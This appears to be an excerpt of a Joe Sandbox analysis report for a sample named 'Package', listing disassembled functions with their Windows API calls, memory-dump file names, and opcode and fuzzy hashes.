___AdjustPointer.LIBCMT ref: 6C4E30FF
___AdjustPointer.LIBCMT ref: 6C4E3122
___AdjustPointer.LIBCMT ref: 6C4E31BE

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: c34bf5bb3a854c5d86e51fc9839e48635bb38931ec7c44c50cb5a180283fef89
Instruction ID: bc4ecdaa3697e0cfa312dcbf135067666c40addcd8693b146b398c2c98bed778
Opcode Fuzzy Hash: c34bf5bb3a854c5d86e51fc9839e48635bb38931ec7c44c50cb5a180283fef89
Instruction Fuzzy Hash: 2151F4B2605602AFEB16CF14C840FAAB3B4EF4D31BF22456DD91447BA0DB31E844CB90

Function 00203940 Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

#861.MFC42U(?,00000001), ref: 002039C4
#6325.MFC42U(?,00000001,00000000), ref: 00203A4F

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #6325#861
String ID:
API String ID: 3876780826-0
Opcode ID: 7b02714f9b8b1c83eb0c4e4f9c534041b95955cacada52b3fec083b2082ba701
Instruction ID: 5517beb2466f8c3c8f944cb61b56f9373aa71101aa1ab2c62a0bcbac0b1a1cf1
Opcode Fuzzy Hash: 7b02714f9b8b1c83eb0c4e4f9c534041b95955cacada52b3fec083b2082ba701
Instruction Fuzzy Hash: 2841F231A20208EFDB05DF98C981BADBBB5BF45314F208099E905AB392D7B1AE50DF54

Function 6C4E6AA6 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 6C4E7D04: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6C4EA890,?,00000000,-00000008), ref: 6C4E7D65

GetLastError.KERNEL32 ref: 6C4E6B0A
__dosmaperr.LIBCMT ref: 6C4E6B11
GetLastError.KERNEL32(?,?,?,?), ref: 6C4E6B4B
__dosmaperr.LIBCMT ref: 6C4E6B52

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 122b616a5372a7a6473e6e43bd48d615f87bece6d3902f0044c010bc9136ef24
Instruction ID: 1bf1d3f4856a7cad44923753808fe2f21b440cdf5d6331c21d72b41373eb5790
Opcode Fuzzy Hash: 122b616a5372a7a6473e6e43bd48d615f87bece6d3902f0044c010bc9136ef24
Instruction Fuzzy Hash: F1216571A04229AF9710EF658880C9E7BB9AF4D36AB06852CEA15D7B40DB30E805C7A0

Function 6C4E7DA7 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6C4E7DAF

Part of subcall function 6C4E7D04: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6C4EA890,?,00000000,-00000008), ref: 6C4E7D65

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6C4E7DE7
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6C4E7E07

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 9ef0f056f387cf3296ba50dd3320d8e98196dca5a94ae101aec383941bd54982
Instruction ID: 89d3d0b49940688e46ca46be38cf0ceefc93eb25c88352a7e112acd9a0261089
Opcode Fuzzy Hash: 9ef0f056f387cf3296ba50dd3320d8e98196dca5a94ae101aec383941bd54982
Instruction Fuzzy Hash: 5111A1B160A5157F6B1297BAAC8DDAF69BDDE8E2AE7030529F40491602FF608E0181F0

Function 0020C80A Relevance: 6.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetAclInformation.ADVAPI32(?,?,0000000C,00000002,00000000,00000000,00000000,?,?,?,?,?,0020C6E4,00000000,00000000), ref: 0020C83D
GetAce.ADVAPI32(?,00000000,?,?,?,?,?,?,0020C6E4,00000000,00000000), ref: 0020C854
AddAce.ADVAPI32(?,00000002,000000FF,?,?,?,?,?,?,?,0020C6E4,00000000,00000000), ref: 0020C86C
GetLastError.KERNEL32(?,?,?,?,?,0020C6E4,00000000,00000000), ref: 0020C88F

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: ErrorInformationLast
String ID:
API String ID: 3635006208-0
Opcode ID: 05e7d3b0a81696e30e8c26b9dec617c9d5ceb3f33424ba69d61ffbbed8d067fe
Instruction ID: 5c65792404b429a3fa26879671522a94800e9c4c71e582f54cbbfa4f43d14f49
Opcode Fuzzy Hash: 05e7d3b0a81696e30e8c26b9dec617c9d5ceb3f33424ba69d61ffbbed8d067fe
Instruction Fuzzy Hash: 8E11C4B1610316ABD715EFA69C49BBBB3ACBB44710B208329BA05D61C2DA70DD10C7B4

Function 00207419 Relevance: 6.1, APIs: 4, Instructions: 61registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000040), ref: 0020743B
RegOpenKeyW.ADVAPI32(00000000,?,?), ref: 0020745D
RegEnumKeyW.ADVAPI32(?,00000000,?,00000040), ref: 00207496
RegQueryValueW.ADVAPI32(?,?,?,00000208), ref: 002074C9
CLSIDFromString.OLE32(00000000,-00000008), ref: 00207570
wcstol.MSVCRT ref: 00207610
wcsrchr.MSVCRT ref: 0020762C
wcstol.MSVCRT ref: 00207650
wsprintfW.USER32 ref: 00207696
wsprintfW.USER32 ref: 002076B9
RegCloseKey.ADVAPI32(?), ref: 00207743
RegCloseKey.ADVAPI32(00000000), ref: 00207754

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: CloseEnumwcstolwsprintf$FromOpenQueryStringValuewcsrchr
String ID:
API String ID: 1473628064-0
Opcode ID: 5d3f88628f6abf21ef52acad8e4586b6bf2a60fcbc1295e07f75389fd9781d62
Instruction ID: afe720a07e1fa941b78a45492ab157be8cc921bec4e0d2db32d1529faf0728a8
Opcode Fuzzy Hash: 5d3f88628f6abf21ef52acad8e4586b6bf2a60fcbc1295e07f75389fd9781d62
Instruction Fuzzy Hash: 7521A471D1822D9AEB65DF60CC84BE9B7B8EB14700F0000E5A60DA6191D7787F94EF50

Function 001FCED0 Relevance: 6.0, APIs: 4, Instructions: 44windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001FCEE9
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001FCF05
#3297.MFC42U(00000000,00000001,?,00000028), ref: 001FCF30
#2637.MFC42U(00000001,00000000,00000001,?,00000028), ref: 001FCF39

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: MessageSend$#2637#3297
String ID:
API String ID: 837686103-0
Opcode ID: 3dcc0d4953f0bfbb8c8a778fbe6b85a45fc7aac93b9fb2928f5f7320e66db093
Instruction ID: 021e7f9e62d0633d39e85a6097023c00f1ecc970a2e9f6dc965f5e64002d8ca0
Opcode Fuzzy Hash: 3dcc0d4953f0bfbb8c8a778fbe6b85a45fc7aac93b9fb2928f5f7320e66db093
Instruction Fuzzy Hash: 83F0C83134031977E3205A61DC4AFF7FB5AFB91751F024021F7059A0C1CBA15C5197E1

Function 0020F25C Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00213B00,?,?,001FB731,00213998), ref: 0020F268
LeaveCriticalSection.KERNEL32(00213B00,?,?,001FB731,00213998), ref: 0020F29B
SetEvent.KERNEL32(00000000,001FB731,00213998), ref: 0020F32B
ResetEvent.KERNEL32 ref: 0020F337

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: a18efc88ee04f1099a278ffc7a6b42e1a3c2ff334f5ab466450fd0f80ada9371
Instruction ID: 73f23f936af1fe2ff2811c1d8da36d130d3105552378c23a8c92d214dc630449
Opcode Fuzzy Hash: a18efc88ee04f1099a278ffc7a6b42e1a3c2ff334f5ab466450fd0f80ada9371
Instruction Fuzzy Hash: AD017831A14260ABCB04EF58FC4CDD83BAAFB6A3407018029E90AD7320DF726B50CB94

Function 0020CAD4 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000000,?,?,0020CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0020CAF9
OpenProcessToken.ADVAPI32(00000000,?,?,0020CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0020CB00
GetLastError.KERNEL32(?,?,0020CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0020CB0A

Part of subcall function 0020CB3B: GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,00000000,?,?,?,?,0020CB28,00000000,00000000,?), ref: 0020CB71
Part of subcall function 0020CB3B: GetLastError.KERNEL32(?,?,?,0020CB28,00000000,00000000,?,?,?,0020CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0020CB77

CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,0020CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0020CB2D

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: ErrorLastProcessToken$CloseCurrentHandleInformationOpen
String ID:
API String ID: 1647960853-0
Opcode ID: c34d97017b3f08c5f2b7c3ac7798db5c0f3833477552fb876c840dece22d13f8
Instruction ID: 4c29c33ea371197155ae101d64eb9d4d0c2799ad9091cf66c247cc4ac03568fe
Opcode Fuzzy Hash: c34d97017b3f08c5f2b7c3ac7798db5c0f3833477552fb876c840dece22d13f8
Instruction Fuzzy Hash: A3F0A9B2610215FBCB109FB59C0DA9B7BB8FF54750B204225B949D7251EA30DD1097A0

Function 001FEEC0 Relevance: 6.0, APIs: 4, Instructions: 35windowCOMMON

Download Yara Rule

APIs

#6330.MFC42U(00000001), ref: 001FEEC9
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001FEEDE
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001FEEF2
#2634.MFC42U(00000001), ref: 001FEF13

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: MessageSend$#2634#6330
String ID:
API String ID: 3857549013-0
Opcode ID: 86e37b002a159bcaf68d2622fe8794bec9043deede769d575011a11f91a5c12e
Instruction ID: 2e208f8d4e2827fd1cf5ac4a195ff1a332b5d72dd8e7a6d36a483792f4538e41
Opcode Fuzzy Hash: 86e37b002a159bcaf68d2622fe8794bec9043deede769d575011a11f91a5c12e
Instruction Fuzzy Hash: 6FF08C301006486BE7325632DD8DEA7FABADBC3751F52081AF21D824A2CB715C81C660

Function 001FE409 Relevance: 6.0, APIs: 4, Instructions: 32windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001304,00000000,00000000), ref: 001FE41E
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001FE436

Part of subcall function 001FE583: #6211.MFC42U(?,0000130B,?,?,001FD5AA,00000000), ref: 001FE5BE
Part of subcall function 001FE583: RedrawWindow.USER32(?,00000000,00000000,00000105,?,0000130B,?,?,001FD5AA,00000000), ref: 001FE669

SendMessageW.USER32(?,00001309,00000000,00000000), ref: 001FE451
#6211.MFC42U(00000000), ref: 001FE45E

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: MessageSend$#6211$RedrawWindow
String ID:
API String ID: 1685024686-0
Opcode ID: 1105410c9ee92500a0aa2daafb080be1f0f6950903f4f221c50bae0a6695e29f
Instruction ID: e53bb26e200e1cac9f39945e7c4e3122942ea1ea6f4c531b0e8aee59b2a9e110
Opcode Fuzzy Hash: 1105410c9ee92500a0aa2daafb080be1f0f6950903f4f221c50bae0a6695e29f
Instruction Fuzzy Hash: C2F0C0355145407AEA312726EC1DDD7AEFDEBD6B12F06441CB21E920B1DB652A41CAB0

Function 001FC6A6 Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F02), ref: 001FC6C5
SetCursor.USER32(00000000), ref: 001FC6CC

Part of subcall function 001FC6F3: SendMessageW.USER32(?,00001009,00000000,00000000), ref: 001FC722
Part of subcall function 001FC6F3: SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 001FC78D
Part of subcall function 001FC6F3: SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 001FC79D
Part of subcall function 001FC6F3: #2634.MFC42U(00000001,?,?,?,?), ref: 001FC7C8
Part of subcall function 001FC6F3: #2634.MFC42U(00000001,00000001,?,?,?,?), ref: 001FC7D4

LoadCursorW.USER32(00000000,00007F00), ref: 001FC6DF
SetCursor.USER32(00000000), ref: 001FC6E6

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: Cursor$MessageSend$#2634Load
String ID:
API String ID: 1037744270-0
Opcode ID: 9f0ffd31834dc559fb8804f12b2902d4b3a0ed53d660240e0d5d7a626305586d
Instruction ID: aec4f5e97a63c075ffca36a677064d1eb6e6f1f38a7aebc5a91b50fecea721b8
Opcode Fuzzy Hash: 9f0ffd31834dc559fb8804f12b2902d4b3a0ed53d660240e0d5d7a626305586d
Instruction Fuzzy Hash: 1FE065336046146BD7017FD5BC4C9DBBB1DEF977513004422FA1A9E181CFB95906C6E4

Function 6C4ECC26 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6C4EC3D8,00000000,00000001,00000000,?,?,6C4EB279,?,00000000,00000000), ref: 6C4ECC3D
GetLastError.KERNEL32(?,6C4EC3D8,00000000,00000001,00000000,?,?,6C4EB279,?,00000000,00000000,?,?,?,6C4EB81C,00000000), ref: 6C4ECC49

Part of subcall function 6C4ECC0F: CloseHandle.KERNEL32(FFFFFFFE,6C4ECC59,?,6C4EC3D8,00000000,00000001,00000000,?,?,6C4EB279,?,00000000,00000000,?,?), ref: 6C4ECC1F

___initconout.LIBCMT ref: 6C4ECC59

Part of subcall function 6C4ECBD1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C4ECC00,6C4EC3C5,?,?,6C4EB279,?,00000000,00000000,?), ref: 6C4ECBE4

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6C4EC3D8,00000000,00000001,00000000,?,?,6C4EB279,?,00000000,00000000,?), ref: 6C4ECC6E

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 0c394c324bd17471674ed9b18e9d39bf87943e133ab2b81f45e786ba9f941a66
Instruction ID: cf41594f4940307febae273233363736d396bdfffd1739f4ea7c9b00a6abdc97
Opcode Fuzzy Hash: 0c394c324bd17471674ed9b18e9d39bf87943e133ab2b81f45e786ba9f941a66
Instruction Fuzzy Hash: 36F01C36241118BBDF52BF95EC05DDA3F76EF4E7A2B068114FA1885621C632C820DBA1

Function 001FD8F0 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

#2294.MFC42U(?,0000009E,?), ref: 001FD907
#2294.MFC42U(?,00000076,?,?,0000009E,?), ref: 001FD918
#2294.MFC42U(?,00000077,?,?,00000076,?,?,0000009E,?), ref: 001FD929
#2294.MFC42U(?,0000007E,?,?,00000077,?,?,00000076,?,?,0000009E,?), ref: 001FD93A

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #2294
String ID:
API String ID: 314497554-0
Opcode ID: 38d839ec5628c691d1e75c880db02bd680a19cfe716b3d28e5ce9fead809fa45
Instruction ID: 62273164bb585d8c040335937353fd41c3301ca0c04bfe179daa119216c98842
Opcode Fuzzy Hash: 38d839ec5628c691d1e75c880db02bd680a19cfe716b3d28e5ce9fead809fa45
Instruction Fuzzy Hash: 2AF030326086087ADB109A60DC01FAAFB5DFB85740F454126BA1C950E2C7F5BDA5CED0

Function 001FCAA0 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

#2294.MFC42U(?,00000093,?), ref: 001FCAB4
#2294.MFC42U(?,0000008E,?,?,00000093,?), ref: 001FCAC8
#2293.MFC42U(?,00000080,?,?,0000008E,?,?,00000093,?), ref: 001FCADC
#2362.MFC42U(?,00000082,?,?,00000080,?,?,0000008E,?,?,00000093,?), ref: 001FCAF0

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #2294$#2293#2362
String ID:
API String ID: 983985581-0
Opcode ID: da330a662afc8fc8bf956b6e53a61390e624d0649671c4ba55d989809ef528fb
Instruction ID: 514d3249fa6a17cc5bd6479480d0fc3d0c17fb3373925c21fe6427d90eede73f
Opcode Fuzzy Hash: da330a662afc8fc8bf956b6e53a61390e624d0649671c4ba55d989809ef528fb
Instruction Fuzzy Hash: 8FF030322406097ADB11AB50DC01FAAFB6DFB40700F018132BA18964E2DBB1AAA59FD0

Function 00200AF0 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

#2294.MFC42U(?,000000A2,?), ref: 00200B04
#2294.MFC42U(?,000000A6,?,?,000000A2,?), ref: 00200B18
#2294.MFC42U(?,00000095,?,?,000000A6,?,?,000000A2,?), ref: 00200B2C
#2294.MFC42U(?,00000070,?,?,00000095,?,?,000000A6,?,?,000000A2,?), ref: 00200B3D

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #2294
String ID:
API String ID: 314497554-0
Opcode ID: 961d691974a4967dd907121e1fa605c3179baf25f2b816294cbf1f2652f2475c
Instruction ID: eb263ab32dc9c9149938ccd6ba4724960220ce988f449c91cdc3576387f17441
Opcode Fuzzy Hash: 961d691974a4967dd907121e1fa605c3179baf25f2b816294cbf1f2652f2475c
Instruction Fuzzy Hash: 7BF030722406097AEB11AA61DC05FE6FB6DEB41740F414132BA1C990E2DBB1ADA5DED0

Function 001FC620 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

#2294.MFC42U(?,000000A2,?), ref: 001FC634
#2294.MFC42U(?,000000A6,?,?,000000A2,?), ref: 001FC648
#2294.MFC42U(?,00000095,?,?,000000A6,?,?,000000A2,?), ref: 001FC65C
#2294.MFC42U(?,00000070,?,?,00000095,?,?,000000A6,?,?,000000A2,?), ref: 001FC66D

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #2294
String ID:
API String ID: 314497554-0
Opcode ID: 99eeaa3b270ed1fea4ed126587ffeb075330a1d6fcb3241ea659cc9ab8150847
Instruction ID: c0677fcb1754346b53e0d20f8b9891bcb8bef6ce9539054a59da233a56b4eeae
Opcode Fuzzy Hash: 99eeaa3b270ed1fea4ed126587ffeb075330a1d6fcb3241ea659cc9ab8150847
Instruction Fuzzy Hash: 22F03771240609BAEB119A51DC05F95F75DEB41740F014132BA1C950E2D7B1AD65DED0

Function 0020ED80 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

Part of subcall function 0020FB48: GetModuleHandleW.KERNEL32(00000000), ref: 0020FB4F

__set_app_type.MSVCRT ref: 0020ED92
__p__fmode.MSVCRT ref: 0020EDA8
__p__commode.MSVCRT ref: 0020EDB6
__setusermatherr.MSVCRT ref: 0020EDD7

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: 4f83c6ab588a89c5c94e201cfa14671fb5a2955ffa8225356498267f4a3dee8d
Instruction ID: 605b48df1f12ddcc4c20230d6991330e5f012f374ee92b02c10ea8a945f57cb1
Opcode Fuzzy Hash: 4f83c6ab588a89c5c94e201cfa14671fb5a2955ffa8225356498267f4a3dee8d
Instruction Fuzzy Hash: 2BF01C755543019FC778BF30FD1E5887BA2EB2A321B118629E461966F3CF798551CE10

Function 001FC920 Relevance: 6.0, APIs: 4, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 001FC938
#2634.MFC42U(00000000), ref: 001FC946
#6195.MFC42U(001F21A0,00000000), ref: 001FC952
#2634.MFC42U(00000001), ref: 001FC95B

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

